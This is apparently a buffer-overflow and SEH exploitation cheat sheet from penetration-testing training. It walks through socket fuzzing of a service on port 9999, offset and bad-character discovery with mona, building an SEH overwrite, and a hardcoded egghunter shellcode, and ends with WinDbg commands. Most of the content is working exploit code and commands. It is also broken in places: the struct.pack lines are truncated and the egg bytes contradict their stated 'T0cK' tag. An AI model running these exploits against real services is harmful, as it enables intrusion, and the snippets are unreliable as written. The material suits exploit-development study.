Buffer Overflow & SEH Methodology
Buffer Overflow — Complete Workflow
# Step 1: Fuzz to find crash length
import socket
buf = b"A" * 100
while True:
try:
s = socket.socket()
s.connect(("target", 9999))
s.send(b"OVERFLOW1 " + buf)
s.recv(1024)
s.close()
buf += b"A" * 100
except:
print(f"Crashed at: {len(buf)}")
break
# Step 2: Find offset
msf-pattern_create -l 2000 # send pattern
msf-pattern_offset -l 2000 -q
# Step 3: Confirm EIP control
buf = b"A" * offset + b"B" * 4 + b"C" * (2000 - offset - 4)
# Step 4: Find bad chars
# !mona bytearray -b "\x00"
# Send \x01 to \xff in payload, compare with mona
# Step 5: Find JMP ESP
# !mona jmp -r esp -cpb "\x00\x0a\x0d"
# Note address in little-endian struct.pack('
SEH Exploit Structure
# nSEH overwrites to short jump over SEH handler (EB 06 90 90)
# SEH overwrites to pop-pop-ret gadget address
# Find pop-pop-ret
# !mona seh -cpb "\x00\x0a\x0d"
# Exploit structure:
padding = b"A" * offset_to_nSEH
nSEH = b"\xeb\x06\x90\x90" # short jump +6 bytes
SEH = struct.pack("
Egghunter
# NtAccessCheckAndAuditAlarm egghunter (32 bytes)
egg = b"\x54\x59\x57\x54\x59\x57\x54\x59" # tag = "T0cKT0cK" x2 (8 bytes tag)
egghunter = (
b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
b"\xef\xb8\x54\x30\x63\x4b\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
# Place egghunter in small buffer, tag + shellcode anywhere else in memory
large_buf = egg + egg + shellcode
WinDbg Quick Reference
.loadby sos clr # Load SOS extension
lm # List modules
bp module!function # Set breakpoint
g # Go (continue)
p # Step over
t # Step into
dd esp L10 # Display DWORD at esp (16 values)
da eip # Display ASCII string at eip
u eip L20 # Unassemble 20 instructions
k # Stack trace
!address esp # Address info
!exploitable # Check exploitability
.formats 0x625011af # Show number in all formats
Use !mona config -set workingfolder C:\mona\%p to set per-process output folders in Immunity Debugger.